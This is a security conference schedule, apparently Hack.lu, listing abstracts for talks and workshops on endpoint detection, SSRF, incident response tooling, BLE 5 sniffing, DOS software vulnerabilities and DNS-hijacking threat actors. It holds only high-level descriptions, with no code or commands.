WHIDS is one of the first open source endpoint detection solution for windows designed with fast Incident Response in mind. It comes with a powerful rule definition format known as Gene allowing one to achieve complex detection primitives. One of its strengths compared to other approaches is that it dumps artifacts (process, file, registry) based on the criticality of the events detected. This allows one to collect artifacts as close as possible of the alert generated. This approach reduces considerably the incident response process while putting the focus on artifact analysis automation.

The purpose of this workshop will be twofold. In the first place I will introduce the tool and the rule definition format (30 to 45 mins). In a second part some hands-on with the attendees will be made (the rest of the time). The first part of the hands-on will cover simple WHIDS deployment and tweaking. Then comes a realistic case study. In the first place we will study a technique (or a malware) common to everyone and walk through all the steps leading to the final rule creation. Then the attendees will study on their own a technique or malware sample of their choice and build the appropriate detection rule(s). In the last part we will discuss on the possible implementations in a production environment.

Workshops
DieKirch-Echternach
13:15
45min
Piercing the Veil: Server Side Request Forgery attacks on Internal Networks.
Alyssa Herrera

I demonstrate a successful attack on a cloud-based US Defense website, gaining access to a sensitive internal network, enumeration of internal services, out of bands data leakage and attack vectors unique to cloud architecture. Additionally I will discuss mitigation points for server side request forgery, how this type of vulnerability can manifest, what this type of attack is, and how I'm able to legally hack the Department Of U.S Defense.

Talks
Europe
13:15
180min
Practical Incident Response, With Automation and Collaboration Inside
Saad Kadhi

Investigating cyberattacks is now the norm, instead of the exception. The threat landscape keeps changing at a worrying pace while security analysts have to deal with growing complexity, learn new technologies and continuously adapt to rapidly evolving IT environments.

To ease up their burden and enable them to give the best out of themselves in order to fulfil their important mission, while avoiding the so-called analyst fatigue, they should not be asked to master copying and pasting between different tools and interfaces to get their job done. They should not be asked to follow procedures without clearly understanding them and contributing into their improvement.

Humans have brains, even if the deafening speeches about artificial intelligence and machine learning would want us to believe otherwise. It’s more than time to place humans back at the centre and offer them solutions that get out of their way yet support them in their incident response journey, to learn, adapt, and collaborate at every stage. We are social animals after all, aren’t we?

This is exactly what MISP Project and TheHive Project are all about, providing not only free, open source products to sustain the daily activities of blue teams around the globe, but products that actually work and integrate with one another to cover the full spectrum of incident response, ranging from detection to recovery and cyber threat intelligence production and sharing.

So come join us for three hours of practical incident response where automation and collaboration play a paramount role, using MISP, the de facto standard for threat sharing, TheHive, a Security Incident Response Platform and Cortex, a powerful analysis and active response engine.

Workshops
Hollenfels
14:00
14:00
45min
Defeating Bluetooth Low Energy 5 PRNG for fun and jamming
Damien Cauquil

Bluetooth Low energy version 5 has been published in late 2016, but we still have
no sniffer supporting this specific version (and not that much compatible devices
as well). The problem is this new version introduces a new channel hopping algorithm
that renders previous sniffing tools useless as devices can no longer be attacked
and connections analyzed. This new algorithm is based on a brand new pseudo-random
number generator (PRNG) to provide better collision avoidance while kicking out
all of our good old sniffing tools.

Unless some random hacker manages to break this not-that-strong PRNG and upgrades
his BLE sniffing tool to support this algorithm ;). In this talk, we will explain
why this PRNG is vulnerable and how it can be easily defeated to sniff and jam
communications between two BLE 5 devices. A new version of BtleJack will be
released during this talk, providing an efficient way to sniff BLE 5 connections
to our fellow IoT hacker family.

Talks
Europe
15:15
15:15
45min
DOS Software Security: Is there Anyone Left to Patch a 25-year old Vulnerability?
Alexandre Bartel

Abstract. DOS (Disk Operating System) systems were developed in the
1970s and are still used today, for example in some embedded systems,
management applications or by the gaming community. In this article
we will study the impact of the (lack of) security of DOS applications
on modern systems. We will explain in detail the vulnerability of the
CVE-2018-20343 which affects the Build Engine - a 3D engine - and which
allows arbitrary code execution. We show that such vulnerabilities can
be found in seconds using state-of-the-art fuzzers. Often, running a DOS
applications today means running it within an emulator such as DOSBox.
Such emulators should limit the interaction between the DOS application
and the host OS. Unfortunately, we also show how DOSBox directly
allows emulated applications to access the host file system, thus allowing
to compromise the host machine by changing login scripts for instance.
While this kind of attack usually requires a user action (login, reboot, etc.)
to execute the malicious code, we further show, by explaining CVE-2019-12594,
that even immediate arbitrary code execution can be achieved by
bypassing mitigation techniques such as DEP or ASLR. Finally, we will
describe how software vendor are (or not) patching such vulnerabilities
in DOS applications they still sell today.

Talks
Europe
16:00
16:00
45min
DNS On Fire
Rascagneres Paul, Warren Mercer

Cisco Talos identified malicious actors targeting the DNS protocol successfully for the past several years. In the presentation, we will present 2 threat actors we have been tracking.

The first one developed a piece of malware, named DNSpionage, targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. We identified multiple countries targeted by this redirection. On 22 January 2019, the US DHS published a directive concerning this attack vector. In this presentation, we will present the timeline for these events and their technical details.

The second actor is behind the campaign we named “Sea Turtle”. This actor is more advanced and more aggressive than the previous one. They do not hesitate to target directly registrars and one registry. The talk will present the 2 actors and the methodology used to target the victims.

Talks
Europe
16:45
16:45
15min
CTF Prizes
Hack.lu

Winners of the CTF

Europe